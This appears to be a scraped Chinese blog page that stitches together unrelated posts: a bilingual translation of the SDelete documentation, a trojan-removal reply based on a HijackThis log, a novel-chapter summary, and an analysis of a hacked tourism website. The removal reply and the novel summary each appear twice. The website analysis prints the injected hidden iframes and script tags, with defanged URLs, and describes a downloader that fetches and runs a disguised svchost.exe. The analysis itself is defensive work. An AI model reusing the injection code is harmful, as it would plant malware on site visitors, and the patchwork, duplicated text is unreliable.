Download SDelete 下载SDelete(47 KB)
SDelete v1.51
By Mark Russinovich
endurer 翻译
Published: November 1, 2006
Introduction
介绍
One feature of Windows NT/2000's (Win2K) C2-compliance is that it implements object reuse protection. This means that when an application allocates file space or virtual memory it is unable to view data that was previously stored in the resources Windows NT/2K allocates for it. Windows NT zero-fills memory and zeroes the sectors on disk where a file is placed before it presents either type of resource to an application. However, object reuse does not dictate that the space that a file occupies before it is deleted be zeroed. This is because Windows NT/2K is designed with the assumption that the operating system controls access to system resources. However, when the operating system is not active it is possible to use raw disk editors and recovery tools to view and recover data that the operating system has deallocated. Even when you encrypt files with Win2K's Encrypting File System (EFS), a file's original unencrypted file data is left on the disk after a new encrypted version of the file is created.
Windows NT/2000's (Win2K)C2-要求的特性之一是实施对象重用保护。这意味着当一个应用程序分配文件空间或虚拟内存时,它不能查看Windows NT/2K为其分配的资源中以前存储的数据。在把两类资源分给一个应用程序前,Windows NT会零填充内存和对存放文件的磁盘扇区置零。然而,对象重用不会指令一个之前未删除的文件占用的空间清零。这是因为Windows NT/2K设计时假定操作系统控制着对系统资源的访问。然而,当操作系统不活动时,使用raw 磁盘编辑程序和恢复工具查看或恢复操作系统已重分配的数据是可能的。甚至当你用 Win2K的加密文件系统(EFS)加密文件时,在新的加密版本的文件被创建后,原始未加密的文件数据被留在磁盘上。
The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techiques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. You can use SDelete both to securely delete existing files, as well as to securely erase any file data that exists in the unallocated portions of a disk (including files that you have already deleted or encrypted). SDelete implements the Department of Defense clearing and sanitizing standard DOD 5220.22-M, to give you confidence that once deleted with SDelete, your file data is gone forever. Note that SDelete securely deletes file data, but not file names located in free disk space.
确保被删除文件,以及你用EFS加密的文件免于恢复的安全方法是使用安全删除应用程序。安全删除应用程序覆写被删除文件的磁盘数据,用所示技术来使磁盘数据不可恢复,即使使用可以读取残存被删除文件的磁性媒体的式样的恢复技术。SDelete (Secure Delete) 就是这样的一个应用程序。你既可以使用SDelete来安全地删除现存文件,也可以安全删除存在于磁盘中未分配部分的一些文件数据(包括你已删除或加密的文件)。SDelete实施美国国防部资料摧毁标准DOD 5220.22-M,给予你一旦用SDelete删除,文件数据就永远消失的信心。注意,SDelete安全地删除文件数据,但不含位于自由磁盘空间中的文件名。
SDelete works on Windows 95, 98, NT 4.0 and Win2K.
SDelete运行于Windows 95, 98, NT 4.0 and Win2K。
Top of page
SDelete Usage
SDelete的用法
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk. SDelete accepts wild card characters as part of the directory or file specifier.
SDelete是一个带若干选项的命令行工具。按所给用法,你可以删除一个或多个文件和/或目录,或者净化逻辑磁盘上的自由空间。
Usage: sdelete [-p passes] [-s] [-q]
-p passes
Specifies number of overwrite passes
指定覆写趟数。
-s
Recurse subdirectories
处理子目录。
-q
Don't print errors (quiet)
不显示错误
-z
Cleanse free space
净化自由空间
Top of page
How SDelete Works
SDelete如何工作
Securely deleting a file that has no special attributes is relatively straight-forward: the secure delete program simply overwrites the file with the secure delete pattern. What is more tricky is securely deleting Windows NT/2K compressed, encrypted and sparse files, and securely cleansing disk free spaces.
安全删除无特别相对简单易懂的属性的文件:安全删除程序用安全删除典范简单地覆写。巧妙之处在于安全删除Windows NT/2K压缩的、加密的,和稀疏的文件,安全净化磁盘自由空间。
Compressed, encrypted and sparse are managed by NTFS in 16-cluster blocks. If a program writes to an existing portion of such a file NTFS allocates new space on the disk to store the new data and after the new data has been written, deallocates the clusters previously occupied by the file. NTFS takes this conservative approach for reasons related to data integrity, and in the case of compressed and sparse files, in case a new allocation is larger than what exists (the new compressed data is bigger than the old compressed data). Thus, overwriting such a file will not succeed in deleting the file's contents from the disk.
压缩的、加密的,和稀疏(的文件)被NTFS管制于16-簇块中。如果一个程序写这样的文件的现存部分,NTFS分配新磁盘空间来存储新数据,并在新数据写入后,重新分配该文件原来占用的簇。NTFS采取此保守方法的原因关系到数据完整性,例如压缩的和稀疏的文件,假使新分配的大于现存的(新压缩数据大于旧的压缩数据)。因此,在从磁盘中删除文件的内容时,覆写这样的文件将不成功。
《endurer注:1。such a:(+形容词+名词)这样2。for reason:因为...理由3。in the case of:万一(就...来说,至于)4。in case:假使,以防万一;如果,万一》
To handle these types of files SDelete relies on the defragmentation API. Using the defragmentation APISDelete can determine precisely which clusters on a disk are occupied by data belonging to compressed, sparse and encrypted files. Once SDelete knows which clusters contain the file's data, it can open the disk for raw access and overwrite those clusters.
要处理这类文件,SDelete依靠磁盘碎片整理API。利用磁盘碎片整理API,SDelete可以精确地判断磁盘中被属于压缩的、稀疏和加密的文件的数据占用的簇。一旦SDelete知道哪些簇包含这种文件的数据,它可以打开磁盘以raw访问和覆写这些簇。
Cleaning free space presents another challenge. Since FAT and NTFS provide no means for an application to directly address free space, SDelete has one of two options. The first is that it can, like it does for compressed, sparse and encrypted files, open the disk for raw access and overwrite the free space. This approach suffers from a big problem: even if SDelete were coded to be fully capable of calculating the free space portions of NTFS and FAT drives (something that's not trivial), it would run the risk of collision with active file operations taking place on the system. For example, say SDelete determines that a cluster is free, and just at that moment the file system driver (FAT, NTFS) decides to allocate the cluster for a file that another application is modifying. The file system driver writes the new data to the cluster, and then SDelete comes along and overwrites the freshly written data: the file's new data is gone. The problem is even worse if the cluster is allocated for file system metadata since SDelete will corrupt the file system's on-disk structures.
清理自由空间存在另外的挑战。因为 FAT 和 NTFS 没有为应用程序提供直接定位自由空间的意思,SDelete要二选一。第一个是它可以,像针对压缩的、稀疏,和加密的的文件那样,打开磁盘以以raw访问和覆写自由空间。此方法遭遇一个很大的问题:即使SDelete被编码,能够计算NTFS 和 FAT驱动器的自由空间部分(有些不是小事情),它也将冒与系统发生的激活文件操作发生冲突的危险。例如,说SDelete判断一个簇是自由的,就在这时文件系统驱动程序(FAT, NTFS)决定把该簇分配给另一应用程序正在修改的一个文件。文件系统驱动程序写新数据到该簇,然后 SDelete 出现并覆写刚写入的数据:文件的新数据没了。此问题更糟的是,如果该簇被分配给文件系统元数据,从而SDelete将破坏磁盘文件系统结构。
《endurer注:1。suffer from:遭受(因...而蒙受损害)2。capable of:能够3。run the risk of:冒...的危险4。in collision with:与-相撞(在与-冲突中)5。take place:发生6。come along:一道走;出现;来临;快来7。even worse:更糟的是8。metadata:n. [计]元数据》
The second approach, and the one SDelete takes, is to indirectly overwrite free space. First, SDelete allocates the largest file it can. SDelete does this using non-cached file I/O so that the contents of the NT file system cache will not be thrown out and replaced with useless data associated with SDelete's space-hogging file. Because non-cached file I/O must be sector (512-byte) aligned, there might be some left over space that isn't allocated for the SDelete file even when SDelete cannot further grow the file. To grab any remaining space SDelete next allocates the largest cached file it can. For both of these files SDelete performs a secure overwrite, ensuring that all the disk space that was previously free becomes securely cleansed.
第二种方法,也是SDelete采用的,是不直接覆写自由空间。首先,SDelete分配一个最大的文件。SDelete使用非缓存文件I/O来进行,这样NT文件系统缓存的内容将不会被抛出和被与SDelete相关的大空间文件的无用数据替代。因为非缓存文件I/O必须是对齐扇区(512字节),可能存在一些不能为SDelete文件分配的遗留空间,尤其是SDelete不能再扩大文件时。要获取剩余空间,SDelete下一次分配最大缓存文件。针对这些文件,SDelete执行安全覆写,确保所有以前自由的磁盘空间变得安全净化。
《endurer注:1。thrown out: 抛出(说出,撵走,拒绝,显示,发出,派出,打扰,封杀出局)2。left over:留下(剩下,推迟处理)3。even when:即使当》
On NTFS drives SDelete's job isn't necessarily through after it allocates and overwrites the two files. SDelete must also fill any existing free portions of the NTFS MFT (Master File Table) with files that fit within an MFT record. An MFT record is typically 1KB in size, and every file or directory on a disk requires at least one MFT record. Small files are stored entirely within their MFT record, while files that don't fit within a record are allocated clusters outside the MFT. All SDelete has to do to take care of the free MFT space is allocate the largest file it can - when the file occupies all the available space in an MFT Record NTFS will prevent the file from getting larger, since there are no free clusters left on the disk (they are being held by the two files SDelete previously allocated). SDelete then repeats the process. When SDelete can no longer even create a new file, it knows that all the previously free records in the MFT have been completely filled with securely overwritten files.
在NTFS驱动器上,SDelete的工作在分配和覆写两个文件后不一定完了。SDelete还必须用一些可装入MFT记录的文件填充一些现存的NTFS主文件表(MFT)的自由部分。一个MFT记录常规大小是1KB。存储在磁盘上的小文件要求至少一个MFT记录,然后不能装入一个记录的文件被分配在MFT外的簇中。SDelete所要做的是分配最大的文件,注意自由MFT空间-当文件占据了MFT记录中的所有可用空间,NTFS将防止文件变得更大,因为没有自由簇留在磁盘(它们被SDelete先前分配的两个文件占用了)。SDelete接着重复这个过程。当不能再创建新文件时,SDelete就知道MFT中原先所有的自由记录已经被完整用安全覆写文件填充。
To overwrite file names of a file that you delete, SDelete renames the file 26 times, each time replacing each character of the file's name with a successive alphabetic character. For instance, the first rename of "foo.txt" would be to "AAA.AAA".
要覆写你删除的文件的文件名,SDelete将文件改名26次,每次用连续的字母字符替换文件名的每个字符。例如,“foo.txt”的第一次改名将是“AAA.AAA”。
The reason that SDelete does not securely delete file names when cleaning disk free space is that deleting them would require direct manipulation of directory structures. Directory structures can have free space containing deleted file names, but the free directory space is not available for allocation to other files. Hence, SDelete has no way of allocating this free space so that it can securely overwrite it.
SDelete在清理磁盘自由空间时不能安全删除文件名的原因是,删除他们将要求直接处理目录结构。目录结构可能有包含被删文件的自由空间,但自由目录空间不能分配给其它文件。因此,SDelete无法分配此自由空间以安全覆写。
Download SDelete 下载SDelete(47 KB)
网友的电脑中发现Hacker.com.cn.ini、runouce.exe
endurer 原创2007-03-01 第1版
有位网友发来email,说他的电脑中了病毒。在网友发来的 HijackThis 扫描的 log中,发现如下可疑项:/----O2 - BHO: Tencent Browser Helper - {0C7C23EF-A848-485B-873C-0ED954731014} - C:\Program Files\TENCENT\Adplus\SSAddr1.dll
O2 - BHO: (no name) - {669751ED-D558-49AE-B01A-3B374CC7910E} - C:\WINDOWS\system32\ssup.dll
O3 - Toolbar: CopySo拷贝搜 - {40987A5C-6AB8-4977-8BE9-A8889DE2EDCC} - C:\Program Files\Copyso\CopysoIE.dll (file missing)
O3 - Toolbar: 雅虎助手 - {406F94F0-504F-4A40-8DFD-58B0666ABEBD} - C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\yasbar.dll (file missing)
O4 - HKLM\..\Run: [Runonce] C:\WINDOWS\system32\runouce.exe
O4 - HKLM\..\Run: [stup.exe] C:\PROGRA~1\TENCENT\Adplus\stup.exe
O8 - Extra context menu item: 雅虎搜索 - res://C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\yasbar.dll/203
O9 - Extra button: 网址大全 - {1FBA04EE-3024-11D2-8F1F-0000F87ABD18} - http://www.coc.cc/ (file missing)
O9 - Extra button: 易趣购物 - {DE60714F-AC19-427e-861A-FD60ABDF119A} - http://click2.ad4all.net/url2/urlmanage/url.asp?id=1 (file missing)
O9 - Extra 'Tools' menuitem: 易趣购物 - {DE60714F-AC19-427e-861A-FD60ABDF119A} - http://click2.ad4all.net/url2/urlmanage/url.asp?id=1 (file missing)
O11 - Options group: [TBH] 中文搜搜
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Windows XP - Unknown owner - C:\WINDOWS\Hacker.com.cn.ini----/
O4项中的 C:\WINDOWS\system32\runouce.exe 疑是中国黑客Ⅱ(Worm.ChineseHacker-2)参考:中国黑客(worm.runouce)病毒分析报告http://it.rising.com.cn/antivirus/net_virus/runoucespecial.htm
O23项中的 C:\WINDOWS\Hacker.com.cn.ini 疑是灰鸽子。
修复建议:(下列修复操作可参考【系统修复系列之】基本操作索引 http://endurer.blogchina.com/2591241.html)
卸载:腾讯地址栏搜索,雅虎助手,中文搜搜
重启电脑到安全模式
停止并禁用服务:Windows XP
用WinRAR找到文件:
C:\WINDOWS\Hacker.com.cn.iniC:\WINDOWS\system32\runouce.exeC:\WINDOWS\system32\WPDShServiceObj.dll
打包备份后删除。
用HijackThis修复上列项目
WPDShServiceObj.dll 有可能是 Windows媒体播放器(Windows Media Player,WMP) 11的文件。如果修复后电脑中的WMP工作不正常,你可从HijackThis中恢复或者卸载重装WMP11
清空IE临时文件夹
清空 c:\windows\prefetch
重启电脑,把 Hacker.com.cn.ini,runouce.exe 和 WPDShServiceObj.dll的压缩包作为email附件发到endurer@163.com。
有位网友发来email,说他的电脑中了病毒。在网友发来的 HijackThis 扫描的 log中,发现如下可疑项:/----O2 - BHO: Tencent Browser Helper - {0C7C23EF-A848-485B-873C-0ED954731014} - C:\Program Files\TENCENT\Adplus\SSAddr1.dll
O2 - BHO: (no name) - {669751ED-D558-49AE-B01A-3B374CC7910E} - C:\WINDOWS\system32\ssup.dll
O3 - Toolbar: CopySo拷贝搜 - {40987A5C-6AB8-4977-8BE9-A8889DE2EDCC} - C:\Program Files\Copyso\CopysoIE.dll (file missing)
O3 - Toolbar: 雅虎助手 - {406F94F0-504F-4A40-8DFD-58B0666ABEBD} - C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\yasbar.dll (file missing)
O4 - HKLM\..\Run: [Runonce] C:\WINDOWS\system32\runouce.exe
O4 - HKLM\..\Run: [stup.exe] C:\PROGRA~1\TENCENT\Adplus\stup.exe
O8 - Extra context menu item: 雅虎搜索 - res://C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\yasbar.dll/203
O9 - Extra button: 网址大全 - {1FBA04EE-3024-11D2-8F1F-0000F87ABD18} - http://www.coc.cc/ (file missing)
O9 - Extra button: 易趣购物 - {DE60714F-AC19-427e-861A-FD60ABDF119A} - http://click2.ad4all.net/url2/urlmanage/url.asp?id=1 (file missing)
O9 - Extra 'Tools' menuitem: 易趣购物 - {DE60714F-AC19-427e-861A-FD60ABDF119A} - http://click2.ad4all.net/url2/urlmanage/url.asp?id=1 (file missing)
O11 - Options group: [TBH] 中文搜搜
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Windows XP - Unknown owner - C:\WINDOWS\Hacker.com.cn.ini----/
O4项中的 C:\WINDOWS\system32\runouce.exe 疑是中国黑客Ⅱ(Worm.ChineseHacker-2)参考:中国黑客(worm.runouce)病毒分析报告http://it.rising.com.cn/antivirus/net_virus/runoucespecial.htm
O23项中的 C:\WINDOWS\Hacker.com.cn.ini 疑是灰鸽子。
修复建议:(下列修复操作可参考【系统修复系列之】基本操作索引 http://endurer.blogchina.com/2591241.html)
卸载:腾讯地址栏搜索,雅虎助手,中文搜搜
重启电脑到安全模式
停止并禁用服务:Windows XP
用WinRAR找到文件:
C:\WINDOWS\Hacker.com.cn.iniC:\WINDOWS\system32\runouce.exeC:\WINDOWS\system32\WPDShServiceObj.dll
打包备份后删除。
用HijackThis修复上列项目
WPDShServiceObj.dll 有可能是 Windows媒体播放器(Windows Media Player,WMP) 11的文件。如果修复后电脑中的WMP工作不正常,你可从HijackThis中恢复或者卸载重装WMP11
清空IE临时文件夹
清空 c:\windows\prefetch
重启电脑,把 Hacker.com.cn.ini,runouce.exe 和 WPDShServiceObj.dll的压缩包作为email附件发到endurer@163.com。
大侠狄龙子 1回 概要、endurer评注 向三欺生少年教训 沈煌付钱冰如收徒
第 一 回幽情谁与诉 卷帘人瘦比黄花积想已成痴 客馆灯孤惊素脉
四川小三峡上游二岩峡左近壁山县东面的乡村有小康之家,少年美貌孀妇秦淑华本是江南世族,自幼随宦入川。花信芳年时其夫秀才沈畅病死,遗子沈煌七岁。 淑华早起,见梧叶满地,菊花飘坠,感叹韶光易逝。 沈煌脚泥衣湿、挟着书包,欢跃归来。 沈煌之师周文麟乃淑华麟表亲,品学兼优,又擅医道与风鉴之学,随父宦游,孤身一人,被沈畅约来家中教读。沈畅死前曾示意淑华改嫁。周文麟庄重守礼。 沈煌说昨天周文麟午睡时,乡人向三欺负一个少年外乡人,每一个个蛋多卖半文钱。少年借数蛋为由戏弄向三打碎了十一个蛋。向三见少年不赔碎蛋不买蛋,扬起扁担照头便打,扁担离少年肩头不过寸许,忽然往后仰跌,右膀脱节,求人送信。 沈煌新近又从慧圆老尼习武,胆力均壮,代出半锭银子了结,见向二带了四壮汉赶到,要抓少年,便出手架开。 向二被迎面疾风,撞退好几步,几乎跌倒,见同党因受过沈家好处,发言劝解,就势下台,无意拉动向三右膀,向三痛晕。 向大得信赶来,向少年赔礼求医。 少年说沈煌近日习武,功力大增,无意中将向二撞伤,不医必吐血而亡。将向二、向三治好,令沈煌手击石鼓,应手立碎。 少年同向三订蛋,沈煌愿出蛋钱。 少年约沈煌明早到崖洞吃果。 沈煌见红脸牧童龙子尾随少年,心动跟去。 少年走进树林,龙子入林七八次均被甩出。 沈煌失声一笑。龙子羞怒追打。沈煌连让几次,龙子入林又返,刚一交手,龙子之母狄玉珍现身阻止。 沈煌知龙子乃狄玉珍梦神龙投胎,无夫而孕,怀胎四年始生。见子孝母病,大为感动。龙子磕头赔礼,沈煌强拉不起,只得陪同跪拜。 龙子大喜称服,入林对沈煌说因见少年踏雪无痕,甩牛医牛,不服连撞带抓,吃少年一扬手便跌出好几丈,才苦求拜师。少年说怕龙子打架闯祸,时机未到。 沈煌与龙子同往崖洞。崖洞本是老朱所居,少年去年冬天送二十两银子借住。少年不在,叫老朱传话,命其明早已时以前来见。 沈煌回家一说,文麟料知异人,次早天雨同往。少年竟知文麟同来,令其入见。得知少年名叫简冰如,向居峨眉后山凝碧崖,因当地温泉旁边山夹缝里隐伏着一条毒虫,每逢子午二时向外喷毒。龙子之母去年重病便为无心路过染毒气。现已备齐鸡蛋,十五子夜天晴月明,往温泉诱那毒虫出洞除害。 文麟请求,沈煌得拜简冰如为师,高兴,冒雨回家。 文麟说沈煌是六阴脉象,除非炼就内功不能永年,得拜异人为师,实是天怜苦节。后夜十五月明,欲往温泉观其除害,并加传授,务令沈煌随同前去。
endurer评注
《蜀山剑侠传》开篇“话说四川峨眉山”,《青城十九侠》起笔“话说灌县宣化门外”,这部《大侠狄龙子》故事同样从地属四川的小三峡上游二岩峡左近壁山县开始,可见作者还珠楼主故乡情深。
秦淑华守节抚沈煌、狄玉珍守贞抚龙子,与《蜀山剑侠传》中的燕儿母子等相类,狄玉珍/龙子这样无夫而孕的例子在还珠楼主作品中颇多,如商风子母子,桑仙姥母女等。 卧龙生《金剑雕翎》中的主角萧翎患有三阴绝脉症,与沈煌六阴脉象相似。
[典]卷帘人瘦比黄花(回目)宋代女词人李清照的《醉花阴》有:“莫道不消魂,帘卷西风,人比黄花瘦。”
[人]秦淑华:本是江南世族,自幼随宦入川。其夫秀才沈畅病死,遗子沈煌七岁。家有田园,可收百十担租粮,本是小康之家,守节抚孤过了几年,生活也颇安定。……沈氏官宦人家……时有官家亲戚往来,又有家业,待人甚厚,不时周济穷苦,颇得众心,镇上人民,对于沈氏全家均极敬重。
[人]沈畅:秦淑华之夫,家居重庆,人甚风雅,因爱北碚小三峡风景之胜,移居夏溪口附近。病死。
[人]沈煌:秦淑华之子,七岁。素来用功,只爱习武,时往右邻小庵,从慧圆女尼师徒偷偷习武。……从小体弱,自从习武,体力转强……六阴脉象,虽有鬼脉,并非无救。……最孝,性又爱武,聪明颖悟。……年纪虽轻,手头大方,常随先生同出游山,只遇穷人,定必周济……至性过人,此子人更温和……是六阴脉象,除非炼就内功不能永年
[地]夏溪口:当地又名温泉峡,长河如带,水清若镜,风物清美,景甚灵秀。
[典]花信芳年花信:开花时期,花期。成语“花信年华” 指女子的年龄到了二十四岁。也泛指女子正处年轻貌美之时。芳年:妙龄。指美好的年华。成语“芳年华月”出自南朝·宋·刘铄《拟行行重行行》:“芳年有华月,佳人无还期。”
[人]周文麟:人甚忠诚正直,品学兼优……精医理……少年名士……与沈畅夫妻是好友亲戚……和淑华表亲……家世江南,从小随父宦游,孤身一人,无家可归……少年英俊,饱学聪明,教学全重实际……也是个秀才……也曾学过武功,虽不高明,却知对方深浅,又擅医道与风鉴之学
[人]向三:人最刁狡……蛮野,不可理喻,动辄与人行凶拼命……惯打死架……向家弟兄三人皆非善良,乃兄向二更是力大凶横,茶馆中还有一些同党,无一好惹
[人]向二:力大凶横……一个壮汉,腰间掖着板斧,身后随着四五个短衣壮汉,如飞跑来。
[言]好买好卖,生意不成仁义在。
[人]简冰如:少年貌相清秀,九月间的天气,穿着一件青布单衫,虽然旧得都褪了色,但极干净……住在西面崖洞以内,本来采买鸡蛋,……只我那地方,除这小孩外谁都不许上门。……行踪不定,走得又快,稍一转眼人便不见……向居峨眉后山凝碧崖
[人]龙子:一个年约十六七岁的红脸牧童,貌像甚是丑怪……说话永无更改……至性过人……天异禀性情猛烈。
[人]狄玉珍:本是武官之女,父因革职流落在此,玉珍忽然无夫而孕,生一怪胎。初怀孕时,因老母拷问,为明心迹,曾由乃母请一稳婆,约了近邻妇女查验女贞,实是处女,那怪胎又怀达四年之久方始降生,才息了浮言,曾梦神龙投胎,取名龙子,由此守贞不嫁,想抚孤成立,身染重病,秦淑华命人延医救治,并贴银两使其度日。
[人]老朱:年老苦人……孤身一人甚是寒苦
[怪]毒虫:当地温泉旁边山夹缝里隐伏着一条毒虫,每逢子午二时向外喷毒。……备齐鸡蛋,十五子夜天晴月明,当往温泉诱那毒虫出洞,除此未来隐患
旧雨楼·还珠楼主《大侠狄龙子》 全文
四川小三峡上游二岩峡左近壁山县东面的乡村有小康之家,少年美貌孀妇秦淑华本是江南世族,自幼随宦入川。花信芳年时其夫秀才沈畅病死,遗子沈煌七岁。 淑华早起,见梧叶满地,菊花飘坠,感叹韶光易逝。 沈煌脚泥衣湿、挟着书包,欢跃归来。 沈煌之师周文麟乃淑华麟表亲,品学兼优,又擅医道与风鉴之学,随父宦游,孤身一人,被沈畅约来家中教读。沈畅死前曾示意淑华改嫁。周文麟庄重守礼。 沈煌说昨天周文麟午睡时,乡人向三欺负一个少年外乡人,每一个个蛋多卖半文钱。少年借数蛋为由戏弄向三打碎了十一个蛋。向三见少年不赔碎蛋不买蛋,扬起扁担照头便打,扁担离少年肩头不过寸许,忽然往后仰跌,右膀脱节,求人送信。 沈煌新近又从慧圆老尼习武,胆力均壮,代出半锭银子了结,见向二带了四壮汉赶到,要抓少年,便出手架开。 向二被迎面疾风,撞退好几步,几乎跌倒,见同党因受过沈家好处,发言劝解,就势下台,无意拉动向三右膀,向三痛晕。 向大得信赶来,向少年赔礼求医。 少年说沈煌近日习武,功力大增,无意中将向二撞伤,不医必吐血而亡。将向二、向三治好,令沈煌手击石鼓,应手立碎。 少年同向三订蛋,沈煌愿出蛋钱。 少年约沈煌明早到崖洞吃果。 沈煌见红脸牧童龙子尾随少年,心动跟去。 少年走进树林,龙子入林七八次均被甩出。 沈煌失声一笑。龙子羞怒追打。沈煌连让几次,龙子入林又返,刚一交手,龙子之母狄玉珍现身阻止。 沈煌知龙子乃狄玉珍梦神龙投胎,无夫而孕,怀胎四年始生。见子孝母病,大为感动。龙子磕头赔礼,沈煌强拉不起,只得陪同跪拜。 龙子大喜称服,入林对沈煌说因见少年踏雪无痕,甩牛医牛,不服连撞带抓,吃少年一扬手便跌出好几丈,才苦求拜师。少年说怕龙子打架闯祸,时机未到。 沈煌与龙子同往崖洞。崖洞本是老朱所居,少年去年冬天送二十两银子借住。少年不在,叫老朱传话,命其明早已时以前来见。 沈煌回家一说,文麟料知异人,次早天雨同往。少年竟知文麟同来,令其入见。得知少年名叫简冰如,向居峨眉后山凝碧崖,因当地温泉旁边山夹缝里隐伏着一条毒虫,每逢子午二时向外喷毒。龙子之母去年重病便为无心路过染毒气。现已备齐鸡蛋,十五子夜天晴月明,往温泉诱那毒虫出洞除害。 文麟请求,沈煌得拜简冰如为师,高兴,冒雨回家。 文麟说沈煌是六阴脉象,除非炼就内功不能永年,得拜异人为师,实是天怜苦节。后夜十五月明,欲往温泉观其除害,并加传授,务令沈煌随同前去。
endurer评注
《蜀山剑侠传》开篇“话说四川峨眉山”,《青城十九侠》起笔“话说灌县宣化门外”,这部《大侠狄龙子》故事同样从地属四川的小三峡上游二岩峡左近壁山县开始,可见作者还珠楼主故乡情深。
秦淑华守节抚沈煌、狄玉珍守贞抚龙子,与《蜀山剑侠传》中的燕儿母子等相类,狄玉珍/龙子这样无夫而孕的例子在还珠楼主作品中颇多,如商风子母子,桑仙姥母女等。 卧龙生《金剑雕翎》中的主角萧翎患有三阴绝脉症,与沈煌六阴脉象相似。
[典]卷帘人瘦比黄花(回目)宋代女词人李清照的《醉花阴》有:“莫道不消魂,帘卷西风,人比黄花瘦。”
[人]秦淑华:本是江南世族,自幼随宦入川。其夫秀才沈畅病死,遗子沈煌七岁。家有田园,可收百十担租粮,本是小康之家,守节抚孤过了几年,生活也颇安定。……沈氏官宦人家……时有官家亲戚往来,又有家业,待人甚厚,不时周济穷苦,颇得众心,镇上人民,对于沈氏全家均极敬重。
[人]沈畅:秦淑华之夫,家居重庆,人甚风雅,因爱北碚小三峡风景之胜,移居夏溪口附近。病死。
[人]沈煌:秦淑华之子,七岁。素来用功,只爱习武,时往右邻小庵,从慧圆女尼师徒偷偷习武。……从小体弱,自从习武,体力转强……六阴脉象,虽有鬼脉,并非无救。……最孝,性又爱武,聪明颖悟。……年纪虽轻,手头大方,常随先生同出游山,只遇穷人,定必周济……至性过人,此子人更温和……是六阴脉象,除非炼就内功不能永年
[地]夏溪口:当地又名温泉峡,长河如带,水清若镜,风物清美,景甚灵秀。
[典]花信芳年花信:开花时期,花期。成语“花信年华” 指女子的年龄到了二十四岁。也泛指女子正处年轻貌美之时。芳年:妙龄。指美好的年华。成语“芳年华月”出自南朝·宋·刘铄《拟行行重行行》:“芳年有华月,佳人无还期。”
[人]周文麟:人甚忠诚正直,品学兼优……精医理……少年名士……与沈畅夫妻是好友亲戚……和淑华表亲……家世江南,从小随父宦游,孤身一人,无家可归……少年英俊,饱学聪明,教学全重实际……也是个秀才……也曾学过武功,虽不高明,却知对方深浅,又擅医道与风鉴之学
[人]向三:人最刁狡……蛮野,不可理喻,动辄与人行凶拼命……惯打死架……向家弟兄三人皆非善良,乃兄向二更是力大凶横,茶馆中还有一些同党,无一好惹
[人]向二:力大凶横……一个壮汉,腰间掖着板斧,身后随着四五个短衣壮汉,如飞跑来。
[言]好买好卖,生意不成仁义在。
[人]简冰如:少年貌相清秀,九月间的天气,穿着一件青布单衫,虽然旧得都褪了色,但极干净……住在西面崖洞以内,本来采买鸡蛋,……只我那地方,除这小孩外谁都不许上门。……行踪不定,走得又快,稍一转眼人便不见……向居峨眉后山凝碧崖
[人]龙子:一个年约十六七岁的红脸牧童,貌像甚是丑怪……说话永无更改……至性过人……天异禀性情猛烈。
[人]狄玉珍:本是武官之女,父因革职流落在此,玉珍忽然无夫而孕,生一怪胎。初怀孕时,因老母拷问,为明心迹,曾由乃母请一稳婆,约了近邻妇女查验女贞,实是处女,那怪胎又怀达四年之久方始降生,才息了浮言,曾梦神龙投胎,取名龙子,由此守贞不嫁,想抚孤成立,身染重病,秦淑华命人延医救治,并贴银两使其度日。
[人]老朱:年老苦人……孤身一人甚是寒苦
[怪]毒虫:当地温泉旁边山夹缝里隐伏着一条毒虫,每逢子午二时向外喷毒。……备齐鸡蛋,十五子夜天晴月明,当往温泉诱那毒虫出洞,除此未来隐患
旧雨楼·还珠楼主《大侠狄龙子》 全文
某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等
endurer 原创2007-02-28 第1版
该网站的网页末被加入代码:/------<iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm width=0 height=0></iframe><iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm width=0 height=0></iframe><script language=javascript src=hxxp://yu***s*ahi.com/js/test.js></script>------/
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm的内容为JavaScript脚本程序,用String.fromCharCode解密变量t的值并输出。
解出的变量t的值为jscript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 she.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : d:\test\she.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-2-28 12:40:25修改时间 : 2007-2-28 12:40:26访问时间 : 2007-2-28 0:0:0大小 : 21096 字节 20.616 KBMD5 : 1fdbf69232ca57bd9f25116def0b622b
瑞星报为:Trojan.DL.Direct.et
Scanned file: she.exe - Infected
she.exe - infected by Trojan-Downloader.Win32.Small.dzu
Statistics:
Known viruses:
274479
Updated:
27-02-2007
File size (Kb):
21
Virus bodies:
1
Files:
1
Warnings:
0
Archives:
0
Suspicious:
0
she.exe中包含信息:/---I want to dedicate this message to gates. Gates, you suck. Gatesyou really are homosexual---/会下载文件hxxp://i***.th***e***c.cn/y**j*1*6***6/js.exe,保存为:c:\js.exe
文件说明符 : d:\test\js.exe属性 : A---语言 : 英语(美国)文件版本 : 5.2.3790.1830说明 : Generic Host Process for Win32 Services版权 : (C) Microsoft Corporation. All rights reserved.备注 : 产品版本 : 5.2.3790.1830产品名称 : Microsoft(R) Windows(R) Operating System公司名称 : Microsoft Corporation合法商标 : 内部名称 : rpcs.exe源文件名 : rpcs.exe创建时间 : 2007-2-28 12:55:43修改时间 : 2007-2-28 12:54:56访问时间 : 2007-2-28 0:0:0大小 : 237568 字节 232.0 KBMD5 : 993561111ed73214fd3507ff7669f764
瑞星报为:Trojan.DL.Inject.sh
Scanned file: js.exe - Infected
